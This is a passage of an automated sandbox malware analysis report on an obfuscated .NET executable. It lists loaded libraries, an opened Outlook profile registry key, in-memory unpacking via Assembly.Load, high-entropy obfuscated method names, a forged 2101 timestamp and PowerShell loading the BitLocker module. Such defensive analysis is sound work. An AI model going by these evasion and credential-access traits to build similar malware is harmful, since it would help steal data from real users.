Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: VbcXXnmIwPPhh.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: VbcXXnmIwPPhh.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: VbcXXnmIwPPhh.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: geWD.pdbSHA256 source: VbcXXnmIwPPhh.exe
Source: Binary string: geWD.pdb source: VbcXXnmIwPPhh.exe

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: VbcXXnmIwPPhh.exe, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.32fd858.3.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, aTN0PgLVcauSVu2vqN.cs .Net Code: W9s2BCu23c System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, aTN0PgLVcauSVu2vqN.cs .Net Code: W9s2BCu23c System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.32f4240.0.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.32a52e4.2.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.32ae8fc.1.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.5a60000.7.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Binary contains a suspicious time stamp
Source: VbcXXnmIwPPhh.exe Static PE information: 0xF6BE9C4F [Tue Mar 8 01:03:11 2101 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 0_2_0308EF83 push eax; iretd 0_2_0308EF89
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF9241 push es; ret 6_2_06DF9244
Source: VbcXXnmIwPPhh.exe Static PE information: section name: .text entropy: 7.877925712281058
Source: 0.2.VbcXXnmIwPPhh.exe.32fd858.3.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, v7TfX0cN66hhgJUJwJ.cs High entropy of concatenated method names: 'ToString', 'tYtEm3rlXp', 'vZaEZQIpk3', 'enfECqHPKk', 'TiREs4OPj4', 'V4sE1AleDf', 'o8jElDFfEH', 'X9YEXlv4sh', 'WhJE57XeeZ', 'sy4EguL75h'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, Ny32pHRu6f6w0bk14d.cs High entropy of concatenated method names: 'EUQxy60RTE', 'GOrxOnVlIn', 'mxyaCSY16D', 'd7gasNaEoC', 'RYVa16poEv', 'ro7alD1Ytv', 'Pj2aX56jE5', 'nvRa5RHSuw', 'zaXagL67RF', 'ijHaM3PHBR'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, SjH6iEglMe4JJag9x8.cs High entropy of concatenated method names: 'GTgTv7jFOs', 'g63T6gTtJJ', 'Un5TBFqG9v', 'RACTJMZ9bi', 'uDUTyXXH8o', 'ttpTIMn7My', 'ixwTOcamDV', 'U8FTGJyhTc', 'DRgT0oSJJc', 'vXTTRDyaMP'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, fLnSLcQsburVYyKgWh.cs High entropy of concatenated method names: 'pIb9MloKhA', 'btn94NtaLA', 'mTK9QfZnoS', 'wRd9894dcU', 'ET59Z9xoO7', 'xL09CQygcx', 'qP89sdBucM', 'Rwp91lgwXE', 'fPj9ls0GM0', 'nks9XUYwAO'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, rlPD0bXvfvPTrMIcH5.cs High entropy of concatenated method names: 'e65TwXhNAU', 'w7ATay3otw', 'vrOTr8r1hQ', 'c6drog7VmU', 'QRvrzRjDHx', 'D5mTdY4DOy', 'XJwTi8ol6A', 'Et7TtSsUv7', 'c1ETWhxGlJ', 'it6T2gL70U'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, LL8myueE5FL4FwPBUS.cs High entropy of concatenated method names: 'IGY7wAn8xX', 'SMf7bnNiMM', 'gai7aBcGKZ', 'gYU7xa46mf', 'Tai7ri1XLD', 'RWM7Tud8cw', 'S477LeGX0v', 'oWQ7jDfCfk', 'X567VkWFsL', 'qgK7k0yM4F'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, aTN0PgLVcauSVu2vqN.cs High entropy of concatenated method names: 'x2HWAJrm7n', 'YRBWwTlYhH', 'NITWbSnOJ8', 'oykWaLIb5Y', 'QgSWx7XFW1', 'el2WrcOKqI', 'IlEWTQlXkN', 'XqqWLYjyje', 'AZZWjYFYgF', 'eZoWVEVCrl'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, nH6PHboIq1eMy9lsOx.cs High entropy of concatenated method names: 'ackui3ikbG', 'gSuuWAk9xU', 'vdRu2MdvAZ', 'SFIuws18kO', 'yPpub68xXI', 'OkEuxOlrHJ', 'zp8urCGwpj', 'kWA7FodH4s', 'kgH7eVO1XV', 'ktZ7DwkVEe'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, kUuY6siW5vyxdHktXRf.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lNPfQMtMH6', 'fkjf8cg9YX', 'CT4fc0NUBi', 'F4vfU3T65j', 'Py4fnEdgPE', 'TU0fSVvsBc', 'PXIfFg2SIF'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, KdrMBNtPmnWruc2Qo7.cs High entropy of concatenated method names: 'bNhBtReFj', 'YwuJEL0k0', 'STtIOekSi', 'TA5O2Qx0W', 'Uwx0i4UAw', 'SKZRHMqIX', 'FaWcWiVd8IfEJwL3Zh', 'aP4F1ZkeqAoDHx4Lni', 'hY17K8DD4', 'YC2fqW3vm'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, eRvY0DhwwMDag3tMd8.cs High entropy of concatenated method names: 'kEKrAhwBHI', 'QSIrbFKx8p', 'ktdrxpX7HE', 'J8drTrlP1a', 'NQZrLqnoFZ', 'Ddvxn0inuX', 'uhsxSNldTl', 'uZmxFBsHXU', 'yk3xe1MXrB', 'eqtxDwg8Hs'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, L6vjyKid9aDaoe5HiaO.cs High entropy of concatenated method names: 'tKYuvg3uhQ', 'dkau6uePqw', 'LNruBiEWeX', 'bvEuJGXBRD', 'JXvuy30LoP', 'i90uII0vV5', 'OpSuOBSVNI', 'VUEuG1wI7u', 'pYqu0SUl47', 'GmmuRirhCu'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, p94yMyHuCERHsEo3os.cs High entropy of concatenated method names: 'UsUKGd1mkt', 'U6CK0pf1S0', 'S3PKhLWoSg', 'UerKZ8wgdv', 'aD9KsVHUvx', 'SaAK1fhsGJ', 'vllKXTUJdY', 'AOYK5k7Qcf', 'WbUKM7gBsa', 'uhFKmU0jCt'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, HBDxB2GmiOduxajCiD.cs High entropy of concatenated method names: 'VG8bQdamFt', 'Mcsb8Neh6h', 'j76bcyQceC', 'rqobUIVvGH', 'GOmbn1VCfa', 'XEBbSAXcxL', 'cY6bFGmfXk', 'rZ0be0CNYh', 'FPbbDSgUqK', 'NdcbonGkta'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, qHKnAkDX8ytgCp1mSc.cs High entropy of concatenated method names: 'XcY7hRUl9B', 'Lf07Z6ZgBh', 'dTS7CjD8xQ', 'I7x7s45AYg', 'XK67QEMgwi', 'M0i719PkGi', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, sjbL9g05wUgikYyDq1.cs High entropy of concatenated method names: 'm27aJnf468', 'bAfaI74f6b', 'JqVaGiBOTZ', 'Cfsa0q7xQy', 'eDra9nnYur', 'qUOaENg53T', 'l30aN5OS2T', 'ttJa7hxU2t', 'I0FauJhQu3', 'VNAafHbWpQ'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, XOPcij2EZTlP5u1gAE.cs High entropy of concatenated method names: 'oiZiTBDxB2', 'OiOiLduxaj', 'N5wiVUgikY', 'ADqik1gy32', 'gk1i94dARv', 'v0DiEwwMDa', 'h9K238GjxV4a826a1t', 'AXiI3JJh6XSFe6oQp7', 'waYiijekAY', 'AEpiW4fqTH'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, qiNcDkbGW6sJO9UAgD.cs High entropy of concatenated method names: 'Dispose', 'p7uiDLa8Py', 'MSFtZuGERn', 'TOyqqR1KP0', 'P5Lio8myuE', 'MFLiz4FwPB', 'ProcessDialogKey', 'TS7tdHKnAk', 'K8ytitgCp1', 'OScttkH6PH'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, v7TfX0cN66hhgJUJwJ.cs High entropy of concatenated method names: 'ToString', 'tYtEm3rlXp', 'vZaEZQIpk3', 'enfECqHPKk', 'TiREs4OPj4', 'V4sE1AleDf', 'o8jElDFfEH', 'X9YEXlv4sh', 'WhJE57XeeZ', 'sy4EguL75h'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, Ny32pHRu6f6w0bk14d.cs High entropy of concatenated method names: 'EUQxy60RTE', 'GOrxOnVlIn', 'mxyaCSY16D', 'd7gasNaEoC', 'RYVa16poEv', 'ro7alD1Ytv', 'Pj2aX56jE5', 'nvRa5RHSuw', 'zaXagL67RF', 'ijHaM3PHBR'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, SjH6iEglMe4JJag9x8.cs High entropy of concatenated method names: 'GTgTv7jFOs', 'g63T6gTtJJ', 'Un5TBFqG9v', 'RACTJMZ9bi', 'uDUTyXXH8o', 'ttpTIMn7My', 'ixwTOcamDV', 'U8FTGJyhTc', 'DRgT0oSJJc', 'vXTTRDyaMP'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, fLnSLcQsburVYyKgWh.cs High entropy of concatenated method names: 'pIb9MloKhA', 'btn94NtaLA', 'mTK9QfZnoS', 'wRd9894dcU', 'ET59Z9xoO7', 'xL09CQygcx', 'qP89sdBucM', 'Rwp91lgwXE', 'fPj9ls0GM0', 'nks9XUYwAO'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, rlPD0bXvfvPTrMIcH5.cs High entropy of concatenated method names: 'e65TwXhNAU', 'w7ATay3otw', 'vrOTr8r1hQ', 'c6drog7VmU', 'QRvrzRjDHx', 'D5mTdY4DOy', 'XJwTi8ol6A', 'Et7TtSsUv7', 'c1ETWhxGlJ', 'it6T2gL70U'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, LL8myueE5FL4FwPBUS.cs High entropy of concatenated method names: 'IGY7wAn8xX', 'SMf7bnNiMM', 'gai7aBcGKZ', 'gYU7xa46mf', 'Tai7ri1XLD', 'RWM7Tud8cw', 'S477LeGX0v', 'oWQ7jDfCfk', 'X567VkWFsL', 'qgK7k0yM4F'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, aTN0PgLVcauSVu2vqN.cs High entropy of concatenated method names: 'x2HWAJrm7n', 'YRBWwTlYhH', 'NITWbSnOJ8', 'oykWaLIb5Y', 'QgSWx7XFW1', 'el2WrcOKqI', 'IlEWTQlXkN', 'XqqWLYjyje', 'AZZWjYFYgF', 'eZoWVEVCrl'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, nH6PHboIq1eMy9lsOx.cs High entropy of concatenated method names: 'ackui3ikbG', 'gSuuWAk9xU', 'vdRu2MdvAZ', 'SFIuws18kO', 'yPpub68xXI', 'OkEuxOlrHJ', 'zp8urCGwpj', 'kWA7FodH4s', 'kgH7eVO1XV', 'ktZ7DwkVEe'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, kUuY6siW5vyxdHktXRf.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lNPfQMtMH6', 'fkjf8cg9YX', 'CT4fc0NUBi', 'F4vfU3T65j', 'Py4fnEdgPE', 'TU0fSVvsBc', 'PXIfFg2SIF'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, KdrMBNtPmnWruc2Qo7.cs High entropy of concatenated method names: 'bNhBtReFj', 'YwuJEL0k0', 'STtIOekSi', 'TA5O2Qx0W', 'Uwx0i4UAw', 'SKZRHMqIX', 'FaWcWiVd8IfEJwL3Zh', 'aP4F1ZkeqAoDHx4Lni', 'hY17K8DD4', 'YC2fqW3vm'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, eRvY0DhwwMDag3tMd8.cs High entropy of concatenated method names: 'kEKrAhwBHI', 'QSIrbFKx8p', 'ktdrxpX7HE', 'J8drTrlP1a', 'NQZrLqnoFZ', 'Ddvxn0inuX', 'uhsxSNldTl', 'uZmxFBsHXU', 'yk3xe1MXrB', 'eqtxDwg8Hs'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, L6vjyKid9aDaoe5HiaO.cs High entropy of concatenated method names: 'tKYuvg3uhQ', 'dkau6uePqw', 'LNruBiEWeX', 'bvEuJGXBRD', 'JXvuy30LoP', 'i90uII0vV5', 'OpSuOBSVNI', 'VUEuG1wI7u', 'pYqu0SUl47', 'GmmuRirhCu'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, p94yMyHuCERHsEo3os.cs High entropy of concatenated method names: 'UsUKGd1mkt', 'U6CK0pf1S0', 'S3PKhLWoSg', 'UerKZ8wgdv', 'aD9KsVHUvx', 'SaAK1fhsGJ', 'vllKXTUJdY', 'AOYK5k7Qcf', 'WbUKM7gBsa', 'uhFKmU0jCt'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, HBDxB2GmiOduxajCiD.cs High entropy of concatenated method names: 'VG8bQdamFt', 'Mcsb8Neh6h', 'j76bcyQceC', 'rqobUIVvGH', 'GOmbn1VCfa', 'XEBbSAXcxL', 'cY6bFGmfXk', 'rZ0be0CNYh', 'FPbbDSgUqK', 'NdcbonGkta'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, qHKnAkDX8ytgCp1mSc.cs High entropy of concatenated method names: 'XcY7hRUl9B', 'Lf07Z6ZgBh', 'dTS7CjD8xQ', 'I7x7s45AYg', 'XK67QEMgwi', 'M0i719PkGi', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, sjbL9g05wUgikYyDq1.cs High entropy of concatenated method names: 'm27aJnf468', 'bAfaI74f6b', 'JqVaGiBOTZ', 'Cfsa0q7xQy', 'eDra9nnYur', 'qUOaENg53T', 'l30aN5OS2T', 'ttJa7hxU2t', 'I0FauJhQu3', 'VNAafHbWpQ'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, XOPcij2EZTlP5u1gAE.cs High entropy of concatenated method names: 'oiZiTBDxB2', 'OiOiLduxaj', 'N5wiVUgikY', 'ADqik1gy32', 'gk1i94dARv', 'v0DiEwwMDa', 'h9K238GjxV4a826a1t', 'AXiI3JJh6XSFe6oQp7', 'waYiijekAY', 'AEpiW4fqTH'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, qiNcDkbGW6sJO9UAgD.cs High entropy of concatenated method names: 'Dispose', 'p7uiDLa8Py', 'MSFtZuGERn', 'TOyqqR1KP0', 'P5Lio8myuE', 'MFLiz4FwPB', 'ProcessDialogKey', 'TS7tdHKnAk', 'K8ytitgCp1', 'OScttkH6PH'
Source: 0.2.VbcXXnmIwPPhh.exe.32f4240.0.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.VbcXXnmIwPPhh.exe.32a52e4.2.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.VbcXXnmIwPPhh.exe.32ae8fc.1.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.VbcXXnmIwPPhh.exe.5a60000.7.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
